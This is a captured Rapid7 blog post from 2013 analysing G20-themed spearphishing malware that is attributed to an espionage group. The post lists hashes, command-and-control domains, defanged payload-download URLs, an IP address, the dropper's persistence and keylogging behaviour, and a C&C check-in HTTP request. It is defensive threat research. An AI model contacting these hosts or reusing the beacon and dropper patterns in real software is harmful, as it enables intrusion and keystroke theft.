www.rapid7.com
Open in
urlscan Pro
52.222.214.15
Public Scan
Submitted URL: https://community.rapid7.com/community/infosec/blog/2013/08/26/upcoming-g20-summit-fuels-espionage-operations
Effective URL: https://www.rapid7.com/blog/post/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
Submission: On December 09 via api from US — Scanned from DE
Effective URL: https://www.rapid7.com/blog/post/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
Submission: On December 09 via api from US — Scanned from DE
Form analysis 6 forms found in the DOM
/search
<form action="/search">
<div class="container flex flex-jc-c flex-ai-c">
<div class="search-content flex flex-jc-fs flex-ai-c"><i class="r7-icon r7-icon-search-magnify"></i><input type="search" class="search-input" name="q" placeholder="Search"><input type="submit" class="search-submit button blue"
value="Search"><a id="btnSearchCloseMobile" class="search-close"><i class="r7-icon r7-icon-delete-x"></i></a></div>
</div>
</form>/search
<form action="/search" class="search-content flex flex-jc-c flex-ai-c"><i class="r7-icon r7-icon-search-magnify"></i><input type="search" class="search-input" name="q" placeholder="Search"><input type="submit" class="search-submit button blue"
value="Search"><a class="search-close"><i class="r7-icon r7-icon-delete-x"></i></a></form>/search/
<form action="/search/">
<input class="sb-search-input" placeholder="Search all the things" type="search" value="" name="q" id="search">
<input class="sb-search-submit" type="submit" value="">
</form><form id="contactModal" class="formBlock freemail mkto contactModal">
<div id="intro">
<div id="thankyouText" style="display:none;" class="messageBox green">
<h4><span class="success">Success!</span> Thank you for submission. We will be in touch shortly.</h4>
</div>
<div id="errorText" style="display:none;" class="messageBox red">
<h4><span class="error">Oops!</span> There was a problem in submission. Please try again.</h4>
</div>
<div>
<h2>Submit your information and we will get in touch with you.</h2>
</div>
</div>
<fieldset>
<p id="fieldInstruction" class="instructions">All fields are mandatory</p>
<dl>
<dd>
<label for="firstName">First Name</label>
<input id="firstName" type="text" name="firstName" tabindex="3">
</dd>
</dl>
<dl>
<dd>
<label for="lastName">Last Name</label>
<input id="lastName" type="text" name="lastName" tabindex="4">
</dd>
</dl>
<dl>
<dd>
<label for="jobTitle">Job Title</label>
<input id="jobTitle" type="text" name="jobTitle" tabindex="5">
</dd>
</dl>
<dl>
<dd>
<label for="jobLevel">Job Level</label>
<select name="jobLevel" id="jobLevel" tabindex="1" class="normalSelect dropdownSelect">
<option value="0">Job Level</option>
<option value="Analyst">Analyst</option>
<option value="System/Security Admin">System/Security Admin</option>
<option value="Manager">Manager</option>
<option value="Director">Director</option>
<option value="VP">VP</option>
<option value="CxO">CxO</option>
<option value="Student">Student</option>
<option value="Other">Other</option>
</select>
</dd>
</dl>
<dl>
<dd>
<label for="companyName">Company</label>
<input id="companyName" type="text" name="companyName" tabindex="6">
</dd>
</dl>
<dl>
<dd>
<label for="email">Email</label>
<input id="email" type="text" name="email" tabindex="7">
</dd>
</dl>
<dl>
<dd>
<div class="intl-phone">
<label for="phone">Phone</label>
<div class="flag-container">
<div class="selected-flag">
<div class="iti-flag"></div>
</div>
<ul class="country-list"></ul>
</div>
<input id="phone" type="text" name="phone" tabindex="8">
</div>
</dd>
</dl>
<dl>
<dd>
<label for="country">Country</label>
<select name="country" id="country" tabindex="9" class="form_SelectInstruction normalSelect" onchange="updateCountryData('#contactModal');"></select>
</dd>
</dl>
<dl>
<dd>
<label for="state">State</label>
<select name="state" id="state" tabindex="10" class="form_SelectInstruction normalSelect dropdownSelect"></select>
</dd>
</dl>
<dl class="clearfix expand">
<dd>
<label for="state">Reason for Contact</label>
<select name="contactType" id="contactType" tabindex="1" class="normalSelect dropdownSelect">
<option value="0">- Select -</option>
<option value="20437" data-subopts="20437|Request a Demo;20438|Get Pricing Info;20439|General">I'd like to learn more about vulnerability management</option>
<option value="20440" data-subopts="20440|Request a Demo;20441|Get Pricing Info;20442|General">I'd like to learn more about application security</option>
<option value="20443" data-subopts="20443|Request a Demo;20444|Get Pricing Info;20445|General">I'd like to learn more about incident detection and response</option>
<option value="20433" data-subopts="20433|Request a Demo;20446|Get Pricing Info;20447|General">I'd like to learn more about cloud security</option>
<option value="20448" data-subopts="">I'd like to learn more about Rapid7 professional or managed services</option>
<option value="20450" data-subopts="">I'd like to learn more about visibility, analytics, and automation</option>
<option value="20434" data-subopts="20434|Request a Demo;20435|Get Pricing Info;20436|General">I'd like to learn more about building a comprehensive security program</option>
<option value="21019" data-subopts="21019|Request a demo;21021|Get Pricing Info;21020|General">I'd like to learn more about threat intelligence.</option>
</select>
</dd>
</dl>
<dl class="clearfix expand" id="contactTypeSecondaryParent" style="display:none;">
<dd>
<select name="contactTypeSecondary" id="contactTypeSecondary" tabindex="2" class="normalSelect dropdownSelect">
<option value="0">- Select -</option>
</select>
</dd>
</dl>
<dl class="expand" id="consultant" style="display: none;">
<input id="consultantField" type="checkbox" class="r7-check">
<label for="consultantField">I am a consultant, partner, or reseller.</label>
<br>
<br>
</dl>
<dl class="expand checkboxContainer" id="optout" style="display:none;">
<dd>
<input id="explicitOptOut" type="checkbox" class="r7-check">
<label for="explicitOptOut">I do not want to receive emails regarding Rapid7's products and services.</label>
</dd>
<div class="disc">
<p>Issues with this page? Please email <a href="mailto:info@rapid7.com">info@rapid7.com</a>. Please see updated <a href="/link/678c9fbe33a749f8b614a7be0e36e7ee.aspx">Privacy Policy</a></p>
</div>
</dl>
<dl class="expand">
<button class="submit button blue mdBtn" tabindex="11">Submit</button>
</dl>
<input type="hidden" id="formName" value="ContactPage">
<input type="hidden" id="contactUsFormURL" value="https://www.rapid7.com/blog/post/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/">
<input type="hidden" id="landorExpand" value="land">
</fieldset>
</form><form id="mktoForm_4144" novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;">
<style type="text/css">
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton {
color: #fff;
border: 1px solid #75ae4c;
padding: 0.4em 1em;
font-size: 1em;
background-color: #99c47c;
background-image: -webkit-gradient(linear, left top, left bottom, from(#99c47c), to(#75ae4c));
background-image: -webkit-linear-gradient(top, #99c47c, #75ae4c);
background-image: -moz-linear-gradient(top, #99c47c, #75ae4c);
background-image: linear-gradient(to bottom, #99c47c, #75ae4c);
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:hover {
border: 1px solid #447f19;
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:focus {
outline: none;
border: 1px solid #447f19;
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:active {
background-color: #75ae4c;
background-image: -webkit-gradient(linear, left top, left bottom, from(#75ae4c), to(#99c47c));
background-image: -webkit-linear-gradient(top, #75ae4c, #99c47c);
background-image: -moz-linear-gradient(top, #75ae4c, #99c47c);
background-image: linear-gradient(to bottom, #75ae4c, #99c47c);
}
</style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 110px;">
<div class="mktoAsterix">*</div>Work Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email" name="Email" placeholder="Work Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoPlaceholder mktoPlaceholderHtmlText_2018-05-24T14 942Z"></div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AnonymousIP" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="browseLang" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="InferredCountry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LeadSource" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="ClickSource" class="mktoField mktoFieldDescriptor mktoFormCol" value="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="preferenceBlogDigest" class="mktoField mktoFieldDescriptor mktoFormCol" value="true" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="preferencesLastUpdated" class="mktoField mktoFieldDescriptor mktoFormCol" value="{{system.Date}}" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoSimple" style="margin-left: 120px;"><button type="submit" class="mktoButton">Subscribe</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="4144"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="411-NAK-970">
</form><form novalidate="novalidate" class="mktoForm mktoHasWidth mktoLayoutLeft" style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;">
</form>Text Content
InsightIDR: It was XDR before XDR was even a thing
Learn More
QUICK COOKIE NOTIFICATION
This site uses cookies, including for analytics, personalization, and
advertising purposes. For more information or to change your cookie settings,
click here.
If you continue to browse this site without changing your cookie settings, you
agree to this use.
I AGREE, LET’S GO!
--------------------------------------------------------------------------------
View Cookie Policy for full details
* Products
* Insight Platform Solutions
* XDR & SIEM
INSIGHTIDR
* Threat Intelligence
THREAT COMMAND
* Vulnerability Management
INSIGHTVM
* Dynamic Application Security Testing
INSIGHTAPPSEC
* Orchestration & Automation
INSIGHTCONNECT
* Cloud Security
INSIGHTCLOUDSEC
* More Solutions
* Penetration Testing
METASPLOIT
* On-Prem Vulnerability Management
NEXPOSE
* Application Monitoring & Protection
TCELL
Insight PlatformFree Trial
* Services
* SERVICES
* Managed Services
OPERATIONS, ASSESSMENTS & REPORTING
* Security Consulting
ASSESSMENT, TESTING & RESPONSE
* Product Consulting
QUICK-START & CONFIGURATION
* Training & Certification
SKILLS & ADVANCEMENT
* Customer Success
ONE-STOP SUPPORT CENTER
* Premium Support
PRIORITY HELP & FASTER SOLUTIONS
* Support & Resources
* SUPPORT
* Support Portal
CONTACT CUSTOMER SUPPORT
* Product Documentation
EXPLORE PRODUCT GUIDES
* Release Notes
DISCOVER THE LATEST PRODUCT UPDATES
* Contact Us
TALK TO SALES
* RESOURCES
* Fundamentals
FOUNDATIONAL SECURITY KNOWLEDGE
* Blog
THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
* Resources Library
E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
* Extensions Library
PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
* Partners
RAPID7 PARTNER ECOSYSTEM
* Webcasts & Events
UPCOMING OPPORTUNITIES TO CONNECT WITH US
* Vulnerability & Exploit Database
SEARCH THE LATEST SECURITY RESEARCH
* Research
* en
* English
* Deutsch
* 日本語
* Sign In
Blog
* Select
* Vuln. Management
* Detection & Response
* App Security
* Research
* Cloud Security
* SOAR
* Metasploit
* More...
Try Now
* Products
* Insight Platform Solutions
* XDR & SIEM
INSIGHTIDR
* Threat Intelligence
THREAT COMMAND
* Vulnerability Management
INSIGHTVM
* Dynamic Application Security Testing
INSIGHTAPPSEC
* Orchestration & Automation
INSIGHTCONNECT
* Cloud Security
INSIGHTCLOUDSEC
* More Solutions
* Penetration Testing
METASPLOIT
* On-Prem Vulnerability Management
NEXPOSE
* Application Monitoring & Protection
TCELL
Insight PlatformFree Trial
* Services
* SERVICES
* Managed Services
OPERATIONS, ASSESSMENTS & REPORTING
* Security Consulting
ASSESSMENT, TESTING & RESPONSE
* Product Consulting
QUICK-START & CONFIGURATION
* Training & Certification
SKILLS & ADVANCEMENT
* Customer Success
ONE-STOP SUPPORT CENTER
* Premium Support
PRIORITY HELP & FASTER SOLUTIONS
* Support & Resources
* SUPPORT
* Support Portal
CONTACT CUSTOMER SUPPORT
* Product Documentation
EXPLORE PRODUCT GUIDES
* Release Notes
DISCOVER THE LATEST PRODUCT UPDATES
* Contact Us
TALK TO SALES
* RESOURCES
* Fundamentals
FOUNDATIONAL SECURITY KNOWLEDGE
* Blog
THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
* Resources Library
E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
* Extensions Library
PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
* Partners
RAPID7 PARTNER ECOSYSTEM
* Webcasts & Events
UPCOMING OPPORTUNITIES TO CONNECT WITH US
* Vulnerability & Exploit Database
SEARCH THE LATEST SECURITY RESEARCH
* Research
* en
* English
* Deutsch
* 日本語
* Sign In
* Blog
* Vuln. Management
* Detection & Response
* App Security
* Research
* Cloud Security
* SOAR
* Metasploit
* More...
Try Now
UPCOMING G20 SUMMIT FUELS ESPIONAGE OPERATIONS
* Aug 26, 2013
* 9 min read
* nex
*
*
*
The international policy and financial community is in ferment for the upcoming
G-20 summit, scheduled to kick-off in St Petersburg, Russia, in two weeks from
now. The "Group of Twenty" consists of political leaders, finance ministers and
bank governors from 19 economically-prominent countries, along with
representatives of European Union institutions.
The group has been meeting regularly every year since 2008 in private meetings
where the participants discuss and agree on international financial regulations,
since the global crisis of 2007.
G-20 Summits represent a major event within the global community and attract the
interest and attention of organizations and individuals worldwide. Not
surprisingly, this includes espionage groups.
A swarm of G-20 themed attacks has been rising in the last weeks, intensifying
as we're getting closer to the Summit.
Multiple intrusion groups, potentially originating from China and long tracked
by threat researchers, have been identified operating such attacks, likely
directed at government and financial institutions. In this blog post we'll walk
through some of the incidents we observed so far and describe the tactics and
tools the adversaries have been - and likely still are - using for these
campaigns.
CALC TEAM
The first intrusion group I'm going to cover is one among the "favorites" in the
large pool of targeted attack operators and possibly one of the most prolific
and established ones.
This group goes by multiple names, but it's widely labelled as Calc Team or
APT-12, as labelled by security firm Mandiant. You should have heard of these
guys few months ago as they have been blamed for the New York Times hack.
Within the security community there's the firm belief that the Calc Team is an
espionage group operating from China , which originally stood out due to the use
of a peculiar algorithm used to calculate the connection details to their
Command & Control servers (C&C) out of an initial DNS request. Such group has
been tracked by researchers for years and is believed to be responsible of
numerous attacks against government agencies, financial institutions and defense
contractors.
Despite staying silent for months, possibly due to the attention raised after
the New York Times incident, security firm FireEye very recently observed and
described the return of the team with evolved tactics and tools .
Indicators provided by FireEye largely match the attacks that I'm going to
describe in the following paragraphs, so it seems likely that the attack
described here originate from the same intrusion group.
INCIDENT PROFILES
Before looking at the details of the malware, let's walk through the attacks
that we identified belonging to this ongoing campaign and start connecting the
dots.
All the cases that I'm going to cover here share the following attributes:
* The malware involved in all the attacks has been delivered within a Zip
archive, no exploit was apparently involved.
* All the attacks used the upcoming G20 as a theme for the bait.
* All the attacks had their malware contact domains pointing to the same host,
23.19.122.231.
* All the malicious files used in the attacks belong to the same malware family
and behave in the same way.
ATTACK #1 - MAY 2013
The first symptoms of an ongoing G20-themed campaign showed on May 31st, when a
Canadian user uploaded this file on VirusTotal:
File Name MD5 SHA256 G20 Briefing Papers.zip 08d98a9c1d01429290656b471e2e838d
7caba5616e935b28af47fa872e25b6abed646cc3ceec10af733f0f375eeea157
Following are the attributes of two malware samples contained in such archive:
File Name: G20 Discussion Paper.exe
MD5: 12b0e0525c4dc2510a26d4f1f2863c75
SHA256: 4fd0c6187360c628be002f8556b04856b3166ecd6a193f4885d7f85fca0cb43f
Domain Contacted: status.acmetoy.com
File Name: GPFI Work Plan 2013.exe
MD5: 96c28bddba400ddc9a4b12d6cc806aa3
SHA256: 689be4fa4158ab2980030fa0cb3ffd42df51293d6f38d11c0b32804cfd28a2ac
Domain Contacted: status.acmetoy.com
Both are clearly Windows executable files that try to disguise as PDF documents.
As commonly happen, no exploit has been used here and the attacker uniquely
relied on social engineering the targets to open and execute the files contained
in the archive.
As you can see, they both contact the domain status.acmetoy.com , which was
linked to a different incident and attributed to APT-12 in FireEye's blog post .
Upon execution, both these files extract an actual embedded PDF to the %Temp%
folder and display them to the victim, in order to not raise suspicion.
This is the document embedded in the first file:
This document contains details about the development plan of the Russian
Presidency in preparation for the upcoming G20 Summit. It includes a calendar of
scheduled activities from December 2012 until November 2013.
It seems to be a copy of a legitimate document originally available from the
website of an American think tank .
The second executable embeds the following document:
As described on its website , the "Global Partnership for Financial Inclusion
(GPFI) is an inclusive platform for all G20 countries, interested non-G20
countries and relevant stakeholders to carry forward work on financial
inclusion, including implementation of the Financial Inclusion Action Plan,
endorsed at the G20 Summit in South Korea".
The picture shows an embedded copy of the GPFI's work plan for the current year,
originally available here .
ATTACK #2 - AUGUST 2013
On August 16th, VirusTotal received a submission from France of a Zip archive
with the following attributes:
File Name:
MD5:
SHA256:
G20 Summit Paper.zip:
fb6a39a9d3bad1843bafad1c4eeebb6c8206594eeedf284b8e06caeceae43b8a549e0051bf51d29a37f60c6304926a49
As traditional with the modus operandi of these intrusion groups, we can expect
this archive to have been delivered through a crafted spearphishing email to
selected targets.
The archive contained two additional files with the following attributes:
File Name: G20 Summit Improving global confidence and support the globa.EXE
MD5: 1873b369794470f9a3bcc0458d373948
SHA256: a1f65f38b1fd4d74956ff1c91a2c4d5f57a1d0abab87b8a4b2ec7a45bb34c80e
Domain Contacted: status.mefound.com
File Name: Improving global confidence and support.pdf.exe
MD5: c5ff4c5145e2a7c6b8b9599b90176deb
SHA256: 82fae28267c935c170a97885bd968c2a89e8bd3974d558b6aa9a4ad1670249a4
Domain Contacted: status.mefound.com
Following is a screenshot of the documented embedded in the first sample:
As you can see, the document appears to be a memo from the European Council
regarding the upcoming G20 meeting and the participation of Council's President
Herman van Rompuy and European Commission's President José Manuel Barroso.
Interestingly, the document is actually a legitimate press release from the
European Council and it's originally available here .
The second sample in the archive embeds a very similar document, which looks
like this:
In this case it appears to be a letter from the previously mentioned presidents
of European Council and European Commission, discussing the agenda items for the
upcoming G20 Summit.
Again, this is a copy of a legitimate memo from the European Commission that you
can read here . As you can see, it anticipates that the following points will be
presented and discussed at the summit:
1. Growth and employment needs to be at the top of the G20 agenda
2. Completing financial regulatory reform
3. Push forward the work on tax avoidance and evasion
4. Completing the reform of the International Financial Architecture and
progressing with our work on Development, Anticorruption and Energy
Considering the context and the content of such documents, we can assume that
the attackers are seeking after members of European institutions somewhat
involved in financial policy making.
ATTACK #3 - AUGUST 2013
On August 21st, few hours before I began this writeup, VirusTotal received
another related submission, this time from Hungary. Following are attributes:
File Name: The list of NGOs representatives accredited at the Press Center of
The G20 Leaders' Summit 2013.pdf.exe
MD5: 5729fb35392b068d845b1a19c51164b8
SHA256: 0ea53aa4d7c9ee05d873df4998f27d5642edbb9523c421d258ed1acef81b6202
Domain Contacted: g20russian.tk
This sample belongs to the same family of the two previously mentioned. The
content of the bait still revolves around the G20 Summit:
In this case the malware embeds a list of representatives of Non-Government
Organizations that have been granted access to G20 Summit's Press Center. Yet
again this document is a copy of an original legitimate one, available here .
It's more complicated to make an estimation on what could be the nature of the
target for this incident, as mentioning NGOs leaves space for a wide variety of
options and speculation.
BACKDOOR
After having opened the PDF, the initial dropper copies itself to
%Temp%\AcroRd32.exe, executes the copy with argument "again" and exits:
When executed with such argument, the malware is instructed to initiate its main
procedure, which mainly takes care of:
1. Attempt to download and execute additional malware
2. Log keystrokes
Clearly, these samples are just an initial stage of a larger suite of malware,
possibly including Aumlib and Ixeshe , which it will try to download from a
fixed list of URLs embedded in the binary:
In the cases observed so far, such URLs would be:
hxxp://status.acmetoy.com/DD/favicon.iso
hxxp://status.acmetoy.com/DD/favicon.iso
hxxp://status.acmetoy.com/DD/favicon.iso
hxxp://status.mefound.com/DD815/favicon.ico
hxxp://status.mefound.com/DD815/css.css
hxxp://status.mefound.com/DD815/google-min.js
hxxp://G20russian.tk/1H820/favicon.ico
hxxp://G20russian.tk/1H820/css.css
hxxp://G20russian.tk/1H820/google-min.js
As you can see, they all use some recurrent file paths.
While this download procedure is running on a separate thread, the malware
continues into its main procedure by initiating its keylogging functionality.
In order to intercept keystrokes, the malware constantly loops through an
embedded list of keys and checks the state for each key with GetKeyState Windows
API:
Whenever key buttons appear to be pressed, the malware log the event along with
a timestamp:
The malware performs some HTTP requests to that host in order to check in with
the C&C backend and report status messages:
GET /url.asp?<attack ID>-ShowNewsID-<computer name>=<base64-encoded data> HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: <domain>
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 20 Aug 2013 17:02:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: <cookie>; path=/
Cache-control: private
All the malware binaries covered so far contact domains that resolved to the
same IP address, which appears to be a cloud or dedicated server rented from
UbiquityServers :
23.19.122.231
NetRange: 23.19.120.0 - 23.19.123.255
CIDR: 23.19.120.0/22
OriginAS: AS15003
NetName: NETBLK-UBIQUITY-CHICAGO-23-19-120-0
NetHandle: NET-23-19-120-0-1
OrgName: Ubiquity Server Solutions Chicago
OrgId: NTGL-1
Address: 350 East Cermak Road
City: Chicago
StateProv: IL
PostalCode: 60616
Country: US
Along with the ones already mentioned, the following domains appear to be
resolving to the same IP address, some of which connected to other attacks (such
as this ):
serial.ddns.ms
getfresh.dnsrd.com
status.acmetoy.com
serial.ddns.ms
googles.almostmy.com
newsdaily.flashserv.net
googleupdating.tk
All these domains are either provided by ChangeIP dynamic DNS service or by
Dot.tk free domain registrar, therefore there is no whois information that can
be used for additional correlation.
VirusTotal provides a thorough overview of the activity it observed associated
with 23.19.122.231.
It's interesting to note that the C&C appears to also have a Remote Desktop
server opened on port 3389 :
At the time of writing the C&C appears to still be operative.
CONCLUSIONS
Assuming that the chain of attribution to Calc is correct, it's interesting to
observe that despite major international exposure after the New York Times
incident, the intrusion group/s behind these attacks is still operational and
doesn't seem to have been affected by the sudden attention received by
newspapers and researchers.
Unfortunately we have no visibility into the result of the attacks and whether
the operators managed to be successful, but it's remarkable that despite the
high profile of the average target of these espionage operations, the tactics
and tools adopted are not as sophisticated as one would expect.
As also pointed out by FireEye, the creators of the malware seem to be actively
changing things around in order to avoid detection by network defense layers,
which combined with the lack of exploitation involved, it leaves a large
responsibility on the targeted user to be able to recognize the social
engineering attempt and isolate the attack.
UPCOMING
While this group of attacks seems one of the most prolific, there are others
adopting similar tactics and launching G20 Summit themed attacks. In the
following days, we'll report about a second ongoing campaign using slightly
different methods, but likely targeting very similar kinds of victim.
--------------------------------------------------------------------------------
This research was brought to you by Claudio "nex" Guarnieri from Rapid7 Labs.
References:
* "Hackers in China Attacked The Times for Last 4 Months ", New York Times
* "Chinese hackers attacked New York Times computers for four months ", Ars
Technica
* "Survival of the Fittest: New York Times Attackers Evolve Quickly ", FireEye
Blog
* "status.acmetoy.com Domain Information ", VirusTotal
* "Revamped Aumlib, Ixeshe Malware Found in New China Attacks ", ThreatPost
* Analysis of aafc620d6f0f0fec2234ea1e605402a6 , Malwr
* "23.19.122.231 IP address information ", VirusTotal
POST TAGS
SHARING IS CARING
*
*
*
AUTHOR
nex
View nex's Posts
Please enable JavaScript to view the comments powered by Disqus.
TOPICS
* Metasploit (747)
* Vulnerability Management (376)
* Detection and Response (327)
* Research (223)
* Application Security (132)
* Cloud Security (60)
POPULAR TAGS
* Metasploit
* Logentries
* IT Ops
* Vulnerability Management
* Detection and Response
* Metasploit Weekly Wrapup
* Automation and Orchestration
* Nexpose
* Incident Detection
* Research
* Exploits
* Komand
* Incident Response
* InsightIDR
* Penetration Testing
* .net
* 2022 Planning
* Alcide
* Android
* Antivirus
* API
* Apple
* Application Security
* AppSpider
* Attack surface analysis
* Attack Surface Management
* Authentication
* Automated Remediation
* Automation and Orchestration
* Automation Remediation
* Awards
* AWS
* Azure
* Black Friday
* Botnets
* Breach Preparedness
* Breach Response News
* Capture the Flag
* Car Hacking
* Career Development
* Chrome
* CIS Controls
* CISOs
* Cloud Infrastructure
* Cloud Security
* CMMC
* Compliance
* Confessions of a Former CISO
* Consulting Services
* COVID Health
* COVID-19
* Critical Infrastructure
* Cryptocurrency
* Customer Perspective
* Cyber Monday
* Cybersecurity
* DAST
* Denial of Service (DoS)
* Deployments
* Detection and Response
* DevOps
* DevSecOps
* Email Security
* Emergent Threat Response
* Emerging Threats
* End of Life
* Endpoints
* episode-10
* episode-11
* episode-12
* episode-16
* episode-9
* Events
* Expert Commentary
* Exploits
* Extended Detection and Response
* Finance
* Firefox
* Flash
* Fundamentals
* Gartner
* GDPR
* Google
* Government
* Guest Perspective
* Hacking
* Hacky Holidays 2021
* Haxmas
* Higher Education
* HIPAA
* Home Automation
* Honeypots
* ICER
* Identity Access Management
* incident
* Incident Detection
* Incident Response
* Industry Cyber-Exposure Report
* Industry Cyber-Exposure Report (ICER)
* Infosec
* Insight platform
* InsightAppSec
* InsightCloudSec
* InsightConnect
* InsightIDR
* InsightOps
* InsightPhishing
* InsightVM
* Internet Explorer
* IntSights
* IoT
* IT Ops
* Java
* Javascript
* Kill Chain
* Komand
* Kubernates Security
* Kubernetes
* Labs
* Legal
* Linux
* Log Management
* Log Search
* Logentries
* Lost Bots
* Malware
* Managed Detection and Response
* Managed Security Service Providers
* Manual Regex Editor
* MDR
* MDR Must-Haves
* Medical
* Metasploit
* Metasploit Weekly Wrapup
* Microsoft
* MSSP
* National / Industry / Cloud Exposure Report (NICER)
* National Cybersecurity Awareness Month
* National Exposure
* NCSAM
* Network Traffic Analysis
* Networking
* News
* Nexpose
* NIST
* Open Source
* OSCP
* OWASP Top 10 2021
* Patch Tuesday
* Payload
* PCI
* Penetration Testing
* Permissions
* Phishing
* Podcast
* Product Updates
* Project Heisenberg
* Project Sonar
* Public Policy
* Python
* Quarterly Threat Report
* R7 Book Club
* Ransomware
* Rapid7 Culture
* Rapid7 Disclosure
* Rapid7 Discuss
* Rapid7 Perspective
* Rapid7 Support
* Red Team
* Release Notes
* Remote Working
* Reports
* Research
* RSA
* Ruby on Rails
* SAML
* SecOps
* Security Assertion Markup Language
* Security Nation
* Security Operations Center (SOC)
* Security Strategy
* SIEM
* Skills
* Snyk
* SOAR
* Social Engineering
* Supply Chain Attacks
* tCell
* Third-Party Disclosure
* This One Time on a Pen Test
* THOTCON
* Threat Intel
* Threat Intel Book Club
* Tips and Tricks
* Transportation
* Under the Hoodie
* UNITED
* User Behavior Analytics
* User Experience
* Verizon DBIR
* Virtual Infrastructure
* Virtual Vegas
* Vulnerability Assessments
* Vulnerability Disclosure
* Vulnerability Management
* Vulnerability Risk Management
* WannaCry
* Whiteboard Wednesday
* Windows
* Worms
* XDR
* XSS
* Zero-day
BACK TO TOP
CUSTOMER SUPPORT
+1-866-390-8113 (Toll Free)
SALES SUPPORT
+1-866-772-7437 (Toll Free)
Need immediate help with a breach?
+1-844-727-4347
SOLUTIONS
All Solutions Industry Solutions Compliance Solutions
SUPPORT & RESOURCES
Product Support Resource Library Customer Stories Events & Webcasts Training &
Certification IT & Security Fundamentals Vulnerability & Exploit Database
ABOUT US
Company Diversity, Equity, and Inclusion Leadership News & Press Releases Public
Policy Open Source Investors
CONNECT WITH US
Contact Blog Support Login Careers
© Rapid7
Legal Terms
|
Privacy Policy
|
Export Notice
|
Trust
Chat
Contact Us
SUCCESS! THANK YOU FOR SUBMISSION. WE WILL BE IN TOUCH SHORTLY.
OOPS! THERE WAS A PROBLEM IN SUBMISSION. PLEASE TRY AGAIN.
SUBMIT YOUR INFORMATION AND WE WILL GET IN TOUCH WITH YOU.
All fields are mandatory
First Name Last Name Job Title Job Level Job Level Analyst System/Security Admin
Manager Director VP CxO Student Other Company Email
Phone
Country State Reason for Contact - Select - I'd like to learn more about
vulnerability management I'd like to learn more about application security I'd
like to learn more about incident detection and response I'd like to learn more
about cloud security I'd like to learn more about Rapid7 professional or managed
services I'd like to learn more about visibility, analytics, and automation I'd
like to learn more about building a comprehensive security program I'd like to
learn more about threat intelligence. - Select - I am a consultant, partner, or
reseller.
I do not want to receive emails regarding Rapid7's products and services.
Issues with this page? Please email info@rapid7.com. Please see updated Privacy
Policy
Submit
GENERAL:
info@rapid7.com
SALES:
+1-866-772-7437
sales@rapid7.com
SUPPORT:
+1–866–390–8113 (toll free)
support@rapid7.com
INCIDENT RESPONSE:
1-844-727-4347
More Contact Info
NEVER MISS A BLOG
Get the latest stories, expertise, and news about security today.
*
Work Email:
Subscribe
You’re almost done!
Check your email to confirm your subscription.
Diese Seite ist leider nur auf English verfügbar.
Möchten Sie trotzdem fortfahren?
Weiter zur deutschen Seite Auf der English Seite bleiben